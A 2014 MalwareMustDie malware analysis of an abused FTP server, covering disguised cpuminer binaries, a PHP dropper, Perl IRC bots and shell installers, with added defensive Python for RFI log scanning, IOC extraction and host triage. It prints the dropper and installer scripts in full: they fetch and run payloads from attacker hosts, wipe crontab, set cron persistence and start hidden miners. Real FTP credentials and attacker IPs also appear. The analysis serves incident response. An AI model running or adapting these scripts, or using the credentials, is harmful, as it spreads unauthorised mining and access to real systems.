Case #8 - Journey to Abused FTP

MalwareMustDie, Jun 4th, 2014
// MalwareMustDie - Case #8
// Report base: Journey to abused FTP sites, urls:
// http://blog.malwaremustdie.org/2014/05/a-journey-to-abused-ftp-sites-story-of.html
// http://blog.malwaremustdie.org/2014/06/a-journey-to-abused-ftp-sites-story-of.html
// Samples: http://www.mediafire.com/download/agkazxpg4ie3eqg/Case8-PErl-miners.7z

$ curl "ftp://padlezardftp:123456@84.246.227.121/httpdocs/"
-rwxr-xr-x   1 root     root          872 May 20 00:55 a
-rw-r--r--   1 root     root         1008 May 20 00:56 bot
-rw-r--r--   1 padlezardftp psacln      15138 Apr 16 12:33 botphp
-rwxr-xr-x   1 root     root          283 May  2 04:25 c
-rwxr-xr-x   1 root     root       379680 Dec  3  2013 clamav
-rw-r--r--   1 padlezardftp psacln     753161 Feb 27 07:19 iexplorer.exe
-rw-r--r--   1 padlezardftp psacln     671836 Mar 19 10:35 init.exe
-rwxr-xr-x   1 root     root        15700 Mar 12 05:33 lol
-rw-r--r--   1 padlezardftp psacln     751993 Apr 24 12:26 ovi.exe
-rw-r--r--   1 root     root        26585 Jun  1 19:56 php
-rw-r--r--   1 root     root        15713 Apr 30 01:34 plm
-rw-r--r--   1 root     root        26548 Jun  1 10:16 s0nia
-rwxr-xr-x   1 root     root       518288 Dec  3  2013 sh
-rwxr-xr-x   1 root     root          283 May  2 04:25 update
-rwxr-xr-x   1 root     root       319292 Sep 30  2013 upx

// check ELF:

$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*"|grep ELF
clamav: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x11473c67e3bd026f1c3ce7458b836b15498365c4, stripped
sh:     ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xb7880c540a3530b2831b1618512b5f90269151b8, stripped
upx:    ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
$

// Check PE:

$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*"|grep PE
iexplorer.exe: PE32 executable (GUI) Intel 80386, for MS Windows
init.exe:      PE32 executable (GUI) Intel 80386, for MS Windows
ovi.exe:       PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
$

// Check PHP:

$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*"|grep PHP
bot:           PHP script, ASCII text
$

// Check Perl Script:

$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*"|grep Perl
lol:           Perl script, ASCII text executable
plm:           Perl script, ASCII text executable
$

// Check other formats:

$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*"|grep -v "ELF\|PE\|PHP\|Perl"
a:             POSIX shell script, ASCII text executable
botphp:        C++ source, ASCII text
c:             POSIX shell script, ASCII text executable
php:           data
s0nia:         data
update:        POSIX shell script, ASCII text executable
$

// The ELFs:

// upx - the real UPX packer, recognisable from its own API and help strings:

.rodata:0x080C6680 0x0042  unsigned int upx_adler32(const void*, unsigned int, unsigned int)
.rodata:0x080C66E0 0x00A5  int upx_compress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, upx_callback_t*, int, int, const upx_compress_config_t*, upx_compress_result_t*)
.rodata:0x080C67A0 0x0079  int upx_decompress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, int, const upx_compress_result_t*)
.rodata:0x080C6820 0x008F  int upx_test_overlap(const unsigned char*, const unsigned char*, unsigned int, unsigned int, unsigned int*, int, const upx_compress_result_t*)
.rodata:0x080C9371 0x00AA     Ultimate Packer for eXecutables\n      Copyright (C) 1996 - %s\nUPX %-10s  Markus Oberhumer, Laszlo Molnar & John Reiser  %14s\n\n
.rodata:0x080C941B 0x0039  Usage: %s [-123456789dlthVL] [-qvfk] [-o file] %sfile..\n
.rodata:0x080C947B 0x000C  \nCommands:\n
.rodata:0x080C9491 0x0034    --best compress best (can be slow for big files)\n

// clamav - actually is "minerd", i.e. the cpuminer CPU miner (scrypt / sha256d):
// a cryptocurrency mining ELF renamed to look like an antivirus binary

.rodata:0x08096848 0x002B  Try `minerd --help' for more information.\n
.rodata:0x08096874 0x06A9  Usage: minerd [OPTIONS]\nOptions:\n  -a, --algo=ALGO       specify the algorithm to use\n                          scrypt    scrypt(1024, 1, 1) (default)\n                          sha256d   SHA-256d\n  -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)\n  -O, --userpass=U:P    username:password pair for mining server\n  -u, --user=USERNAME   username for mining server\n  -p, --pass=PASSWORD   password for mining server\n      --cert=FILE       certificate for mining server using SSL\n  -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy\n  -t, --threads=N       number of miner threads (default: number of processors)\n  -r, --retries=N       number of times to retry if a network call fails\n                          (default: retry indefinitely)\n
                           -R, --retry-pause=N   time to pause between retries, in seconds (default: 0)\n  -T, --timeout=N       network timeout, in seconds (default: 270)\n  -s, --scantime=N      upper bound on time spent s
.rodata:0x08096F20 0x002A  accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x08096F4C 0x002D  DEBUG: job_id='%s' extranonce2=%s ntime=%08x
.rodata:0x08096F7C 0x001F  Stratum connection interrupted
.rodata:0x08096F9C 0x002E  {\"method\": \"getwork\", \"params\": [], \"id\":0}\r\n
.rodata:0x08096FCC 0x0027  DEBUG: stale work detected, discarding
.rodata:0x08096FF4 0x004E  {\"method\": \"mining.submit\", \"params\": [\"%s\", \"%s\", \"%s\", \"%s\", \"%s\"], \"id\":4}
.rodata:0x08097044 0x002E  submit_upstream_work stratum_send_line failed
.rodata:0x08097074 0x0034  {\"method\": \"getwork\", \"params\": [ \"%s\" ], \"id\":1}\r\n
.rodata:0x080970A8 0x002A  submit_upstream_work json_rpc_call failed

// sh - is also "minerd" (the 64-bit build); the strings below were pulled with a
// different, better string-extraction tool, one string per line:

.rodata:0x06C318  Usage: minerd [OPTIONS]
.rodata:0x06C330  Options:
.rodata:0x06C339    -a, --algo=ALGO       specify the algorithm to use
.rodata:0x06C36E                            scrypt    scrypt(1024, 1, 1) (default)
.rodata:0x06C3AF                            sha256d   SHA-256d
.rodata:0x06C3DC    -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)
.rodata:0x06C42B    -O, --userpass=U:P    username:password pair for mining server
.rodata:0x06C46C    -u, --user=USERNAME   username for mining server
.rodata:0x06C49F    -p, --pass=PASSWORD   password for mining server
.rodata:0x06C4D2        --cert=FILE       certificate for mining server using SSL
.rodata:0x06C512    -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy
.rodata:0x06C552    -t, --threads=N       number of miner threads (default: number of processors)
.rodata:0x06C5A2    -r, --retries=N       number of times to retry if a network call fails
.rodata:0x06C5EB                            (default: retry indefinitely)
.rodata:0x06C623    -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)
.rodata:0x06C673    -T, --timeout=N       network timeout, in seconds (default: 270)
.rodata:0x06C6B6    -s, --scantime=N      upper bound on time spent scanning current work when
.rodata:0x06C703                            long polling is unavailable, in seconds (default: 5)
.rodata:0x06C752        --no-longpoll     disable X-Long-Polling support
.rodata:0x06C789        --no-stratum      disable X-Stratum support
.rodata:0x06C7BB    -q, --quiet           disable per-thread hashmeter output
.rodata:0x06C7F7    -D, --debug           enable debug output
.rodata:0x06C823    -P, --protocol-dump   verbose dump of protocol-level activities
.rodata:0x06C865    -S, --syslog          use system log for output messages
.rodata:0x06C8A0    -B, --background      run the miner in the background
.rodata:0x06C8D8        --benchmark       run in offline benchmark mode
.rodata:0x06C90E    -c, --config=FILE     load a JSON-format configuration file
.rodata:0x06C94C    -V, --version         display version information and exit
.rodata:0x06C989    -h, --help            display this help text and exit
.rodata:0x06C9C8  accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x06C9F8  DEBUG: job_id='%s' extranonce2=%s ntime=%08x
.rodata:0x06CA28  Stratum connection interrupted
.rodata:0x06CA48  {"method": "getwork", "params": [], "id":0}
.rodata:0x06CA78  DEBUG: stale work detected, discarding
.rodata:0x06CAA0  {"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
.rodata:0x06CAF0  submit_upstream_work stratum_send_line failed
.rodata:0x06CB20  {"method": "getwork", "params": [ "%s" ], "id":1}

// The PEs are Bitcoin miners as well; VirusTotal analyses:

https://www.virustotal.com/en/file/a343e06a05b863730ec07bbe02c8f3989669afd588603ecca64a73f2db6ed777/analysis/1397692298/
https://www.virustotal.com/en/file/2c5146d815d387fd214a9fbdf5e95885f31512744be4b74b57cac8958e062d07/analysis/1400526645/
https://www.virustotal.com/en/file/eb952920fb9104de08f661a47d76dc7ad5806fc90b2f3a1579da288bdc08066f/analysis/1401094548/

// The PHP file ("bot") is the dropper that infects OTHER hosts: it logs into this same
// FTP server with the hard-coded credentials, fetches init.exe (Windows) or "a" (Linux)
// and executes it (comments added here, the sample's logic is untouched):

<?php
$win_local_file = "c:\windows\init.exe";
$lin_local_file = "/tmp/a";
$win_server_file = "/httpdocs/init.exe";
$lin_server_file = "/httpdocs/a";
$ftp_server = "84.246.227.121";
$ftp_user_name = "padlezardftp";
$ftp_user_pass = "123456";
// note: the sample runs /tmp/a here, before it has been downloaded below
$result = exec("sh /tmp/a");

echo php_uname();
echo PHP_OS;

if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") {
  $conn_id = ftp_connect($ftp_server);
  $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  if (ftp_get($conn_id, $win_local_file, $win_server_file, FTP_BINARY)) {
    // $local_file is never defined in the sample
    echo "Successfully written to $local_file\n";
    // run the PE miner, then delete it from disk
    echo exec("c:\windows\init.exe &del c:\windows\init.exe");
  } else {
    echo "There was a problem\n";
  }
  ftp_close($conn_id);
} else {
  $conn_id = ftp_connect($ftp_server);
  $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  if (ftp_get($conn_id, $lin_local_file, $lin_server_file, FTP_BINARY)) {
    echo "$result";
  } else {
    echo "There was a problem\n";
  }
  ftp_close($conn_id);
}
?>

// THE PERLs...

"lol" and "plm" contain the same code: an IRC Perl bot used to spread the infection
for these miners. It has web-app vulnerability scanning, standard TCP and UDP floods and
a basic HTTP DoS flood, and is controlled over IRC or through a shell.
The code is here: http://pastebin.com/VQVzw7f9

The Perl bot scans for the RFI below. When it finds a vulnerable host it exploits it,
then uses the PHP script above to pull the payloads onto the newly infected host.

The targeted vulnerability is revealed by the bot's scan query:
query="/SQuery/lib/gore.php?libpath="
Reference: http://www.exploit-db.com/exploits/2003/
More ref: https://www.google.com/search?q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D&ie=utf-8&oe=utf-8&client=ubuntu&channel=fs&gws_rd=ssl#channel=fs&nfpr=1&q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D …

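// Added example (not from the original report or from MalwareMustDie): the bot's RFI probe
// leaves a recognisable trace in web server logs. This Python scanner runs over
// constructed Apache combined-format log lines (IPs from the documentation ranges, not the
// real attacker), flags query parameters whose value is a remote URL or a PHP stream wrapper,
// including double-URL-encoded forms, and counts how many probes each source sent. The
// KNOWN_INCLUDE_PARAMS list is an assumption, seeded with the "libpath" parameter above.

```python
"""Detect RFI probes (like the /SQuery/lib/gore.php?libpath= scan) in access logs.
Added example for this write-up; the log lines are constructed, not real traffic."""
import re
from collections import Counter
from typing import Optional
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx combined format up to the response size; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Values that make a careless include($param . "/x.php") load attacker code.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?)://', re.I)
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|compress\.zlib)://', re.I)
# Assumed list of parameter names commonly fed to include(); "libpath" is the one
# the Perl bot in this case probes.
KNOWN_INCLUDE_PARAMS = {"libpath", "page", "file", "path", "dir", "include", "inc", "template"}

def classify_value(value: str) -> Optional[str]:
    """Label a decoded query value, or return None when it looks harmless."""
    v = unquote(value).strip()  # parse_qsl decoded once; this catches %25xx double-encoding
    if REMOTE_SCHEME_RE.match(v):
        return "rfi-remote-url"      # e.g. libpath=http://evil/shell.txt?  (trailing ? swallows the appended path)
    if WRAPPER_RE.match(v):
        return "rfi-stream-wrapper"  # e.g. page=php://input or data://text/plain;base64,...
    return None

def scan_line(line: str) -> Optional[dict]:
    """Return a finding dict for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        label = classify_value(value)
        if label:
            return {
                "src": m.group("src"),
                "path": target.path,
                "param": name,
                "value": unquote(value),
                "label": label,
                "known_param": name.lower() in KNOWN_INCLUDE_PARAMS,
                "status": int(m.group("status")),
            }
    return None

def scan_log(lines) -> list:
    return [f for f in map(scan_line, lines) if f]

def probes_per_source(findings) -> Counter:
    """How many RFI probes each client sent; the scanner in this case walks many hosts."""
    return Counter(f["src"] for f in findings)

# Constructed sample: one scanner (203.0.113.7) probing, one legitimate client.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jun/2014:10:14:31 +0000] "GET /SQuery/lib/gore.php?libpath=http://198.51.100.9/bot.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jun/2014:10:14:32 +0000] "GET /index.php?page=php://input HTTP/1.1" 500 311 "-" "Mozilla/5.0"
198.51.100.23 - - [02/Jun/2014:10:15:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "curl/7.35.0"
203.0.113.7 - - [02/Jun/2014:10:16:40 +0000] "GET /cms/view.php?tpl=%2568ttp%3a%2f%2f198.51.100.9%2fx.txt HTTP/1.1" 404 209 "-" "-"
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['src']} {f['label']:20} {f['path']}?{f['param']}={f['value']} ({f['status']})")
    print(probes_per_source(found))
```

A 200 on the gore.php probe (first line) is the one to chase: the bot's include succeeded, so the host should be checked for the "bot" dropper and the cron job described further down.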
// How the attacker runs these files on a victim is spelled out in file "a"
// (comments added here):

#!/bin/sh
crontab -r                      # wipe whatever crontab the victim had
cd /tmp
rm -rf a* c* update*            # clear out older copies of the scripts
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d   # persistence: run "update" every minute
crontab cron.d
crontab -l | grep update
wget http://padlezard.com/update >> /dev/null &&
curl -O http://padlezard.com/update >> /dev/null &&
chmod u+x update
#chattr -ia bash
#chattr -ia *
curl -O http://padlezard.com/clamav          # 32-bit minerd
curl -O http://padlezard.com/sh              # 64-bit minerd
wget http://padlezard.com/clamav
wget http://padlezard.com/sh
wget http://padlezard.com/plm                # the Perl IRC bot / RFI scanner
curl -O http://padlezard.com/plm
perl plm
rm -rf plm*                                  # bot script removed from disk once started
chmod +x sh
chmod +x clamav
mv clamav bash                               # miner renamed to look like a shell in ps
#kill -9 `ps x|grep miner|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep stratum|grep -v grep|awk '{print $1}'`   # kill any competing miner
killall -9 kav m32 m64
./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B   # -O worker:pass, -B background
./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
#chattr +ia bash
#chattr +ia sh

// "update" ("c" has the same size and timestamp) is the cron watchdog: every minute
// it greps ps for a process connected to the pool and, if there is none, fetches "a"
// again over HTTP from the compromised site, which reinstalls the miners and restarts
// the Perl bot scanner:

#!/bin/sh
plm=`ps x|grep 176.31.255.138:3333|grep -v grep|awk '{print $7}'`
if [ "$plm" != "" ]
then
        echo "MERGE!!!"        # miner already running, nothing to do
else
        echo "Starting!!!"
        wget http://padlezard.com/a && sh a >> /dev/null &
        curl -O http://padlezard.com/a && sh a >> /dev/null &
fi

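// Added example (not the report's own tooling): the dropper and the two shell scripts
// hard-code everything an IR team needs to block or hunt on. The Python below pulls
// the FTP credentials, download URLs, hosts/IPs and the stratum pool plus worker name
// out of fragments of the page's "bot", "a" and "update" files with a handful of regexes;
// the "$ftp_*" variable names it keys on are the dropper's own, and the helper names are mine.

```python
"""Extract network IOCs from the dropper/installer scripts of this case.
Added example for this write-up; SAMPLES holds fragments of the page's own files."""
import re
from urllib.parse import urlsplit

# Fragments of the PHP "bot" dropper and the "a"/"update" shell scripts shown above.
SAMPLES = {
    "bot": '''$ftp_server = "84.246.227.121";
$ftp_user_name = "padlezardftp";
$ftp_user_pass = "123456";
$win_server_file = "/httpdocs/init.exe";''',
    "a": """wget http://padlezard.com/update >> /dev/null &&
curl -O http://padlezard.com/clamav
curl -O http://padlezard.com/sh
./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B""",
    "update": """plm=`ps x|grep 176.31.255.138:3333|grep -v grep|awk '{print $7}'`
wget http://padlezard.com/a && sh a >> /dev/null &""",
}

URL_RE = re.compile(r'\b(?:https?|ftps?|stratum\+tcp)://[^\s"\'`<>]+')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
# The dropper keeps its FTP login in $ftp_server / $ftp_user_name / $ftp_user_pass.
FTP_VAR_RE = re.compile(r'\$(ftp_\w+)\s*=\s*["\']([^"\']*)["\']')
# cpuminer invocation: -o <pool url> -O <worker:password>
MINER_ARGS_RE = re.compile(r'-o\s+(stratum\+tcp://\S+)\s+-O\s+(\S+)')

def extract_iocs(samples):
    """Walk every sample and collect URLs, hosts, IPs, FTP creds and pool/worker pairs."""
    iocs = {"urls": set(), "hosts": set(), "ips": set(), "ftp_creds": {}, "pools": set()}
    for text in samples.values():
        for url in URL_RE.findall(text):
            iocs["urls"].add(url)
            host = urlsplit(url).hostname      # works for stratum+tcp:// too
            if host:
                iocs["hosts"].add(host)
        iocs["ips"].update(IPV4_RE.findall(text))
        iocs["ftp_creds"].update(FTP_VAR_RE.findall(text))
        iocs["pools"].update(MINER_ARGS_RE.findall(text))
    return iocs

def blocklist(iocs):
    """Hosts and IPs to block or alert on, sorted; the pool host comes along for free."""
    return sorted(iocs["hosts"] | iocs["ips"])

def ftp_probe_url(iocs):
    """Rebuild the curl URL used at the top of the page to list the abused account."""
    c = iocs["ftp_creds"]
    return f"ftp://{c['ftp_user_name']}:{c['ftp_user_pass']}@{c['ftp_server']}/httpdocs/"

if __name__ == "__main__":
    found = extract_iocs(SAMPLES)
    print("block:", blocklist(found))
    print("pools:", found["pools"])
    print("ftp:  ", ftp_probe_url(found))
```

The pool/worker pair ("geox.1:x") is as useful as the IP: the same worker name turning up on another host ties that host to the same operator even if the pool address moves.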
// The miners all report to 176.31.255.138:3333, the stratum pool that this operation
// is run through; again it sits at OVH, France, that famously well-stocked malware
// garbage can:

Req time: Wed Jun  4 22:50:59 JST 2014
UP: 176.31.255.138
Result: ns388807.ovh.net.|16276 | 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS

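// Added example (not MalwareMustDie tooling): what to look for on a host suspected of
// running this kit. The Python below checks what the "a"/"update" scripts leave behind:
// a crontab entry running a file out of /tmp every minute, shells started on scripts in
// /tmp, processes whose command line carries a stratum+tcp:// pool (with the pool from
// this case as a known IOC), miners masquerading as "bash"/"sh", and, statically, an ELF
// whose strings match cpuminer (the "mv clamav bash" trick). The crontab, ps output and
// ELF blobs are constructed for the demo; KNOWN_POOLS and the rule names are mine.

```python
"""Host triage for the cron + renamed-cpuminer persistence seen in this case.
Added example for this write-up; all sample data below is constructed."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "kind detail")

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
STRATUM_RE = re.compile(r'stratum\+tcp://([^\s"\']+)')
KNOWN_POOLS = {"176.31.255.138:3333"}   # the pool from this case; extend from your IOC list
SHELL_NAMES = {"bash", "sh", "dash"}
SCRIPT_RUNNERS = SHELL_NAMES | {"perl", "python"}

def check_crontab(text):
    """Flag 'crontab -l' lines that run something out of a world-writable directory,
    like the '* * * * * /tmp/update >/dev/null 2>&1' entry the "a" script installs."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = fields[:5], fields[5]
        if any(d in command for d in WRITABLE_DIRS):
            kind = "cron-tmp-every-minute" if schedule == ["*"] * 5 else "cron-tmp"
            findings.append(Finding(kind, command))
    return findings

def check_processes(ps_text):
    """Flag 'ps x' output: scripts run from /tmp, anything talking to a stratum pool,
    and miners renamed to look like a shell ('mv clamav bash')."""
    findings = []
    for line in ps_text.splitlines()[1:]:          # skip the PID TTY STAT TIME COMMAND header
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, cmd = parts[0], parts[4]
        argv = cmd.split()
        exe = argv[0].rsplit("/", 1)[-1]
        if exe in SCRIPT_RUNNERS and any(a.startswith(WRITABLE_DIRS) for a in argv[1:]):
            findings.append(Finding("script-from-tmp", f"pid={pid} cmd={cmd}"))
        m = STRATUM_RE.search(cmd)
        if not m:
            continue
        pool = m.group(1)
        kind = "known-pool" if pool in KNOWN_POOLS else "stratum-pool"
        findings.append(Finding(kind, f"pid={pid} exe={exe} pool={pool}"))
        if exe in SHELL_NAMES:                     # a real shell never takes -o stratum+tcp://
            findings.append(Finding("renamed-binary", f"pid={pid} exe={exe} cmd={cmd}"))
    return findings

ELF_MAGIC = b"\x7fELF"
MINER_MARKERS = (b"minerd", b"stratum", b"mining.submit", b"khash/s")

def looks_like_miner(blob):
    """Static check for a renamed cpuminer: ELF header plus the strings dumped above."""
    if not blob.startswith(ELF_MAGIC):
        return False
    return sum(1 for marker in MINER_MARKERS if marker in blob) >= 2

def triage(crontab_text, ps_text, binaries):
    """binaries: {path: bytes} of the executables behind the flagged processes."""
    return {
        "cron": check_crontab(crontab_text),
        "procs": check_processes(ps_text),
        "miner_binaries": [p for p, blob in binaries.items() if looks_like_miner(blob)],
    }

# Constructed sample data resembling an infected host.
CRONTAB = """\
# m h dom mon dow command
* * * * * /tmp/update >/dev/null 2>&1
0 3 * * * /usr/bin/certbot renew
"""
PS_OUTPUT = """\
  PID TTY      STAT   TIME COMMAND
 1843 ?        Ss     0:00 /usr/sbin/sshd
 2210 ?        S      0:00 sh /tmp/update
 2217 ?        SNl   12:31 ./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
 2230 ?        SNl   12:29 ./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
 2301 pts/0    Ss     0:00 -bash
 2450 ?        S      0:03 perl plm
 2500 ?        SNl    0:01 /opt/xmr/minerd -o stratum+tcp://pool.example.net:3333 -u w -p x
"""
FAKE_MINER_ELF = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + b"Usage: minerd [OPTIONS]\x00stratum+tcp://\x00khash/s\x00"
FAKE_BASH_ELF = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"GNU bash, version 4.3\x00"

if __name__ == "__main__":
    report = triage(CRONTAB, PS_OUTPUT, {"/tmp/bash": FAKE_MINER_ELF, "/bin/bash": FAKE_BASH_ELF})
    for section, items in report.items():
        print(section, items)
```

Kill the cron job before the miner processes, otherwise "update" simply pulls "a" again within the minute.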
// There is another PHP pbot in the file "botphp" (file(1) misreports it as C++ source);
// it is an older pbot version without the L7 HTTP DDoS functions.

// Two more Perl IRC bots (PowerBot) are in the files "s0nia" and "php"
// (file(1) reports both as "data").
// Functions: deletion of important server directories, UDP DoS, port scanner,
// file downloader, shell backdoor (back-connect), IRC attacks.

// The code for these Perl PowerBots is here:
http://pastebin.com/iJX3xaNF

-----
#MalwareMustDie!!!!!!!!!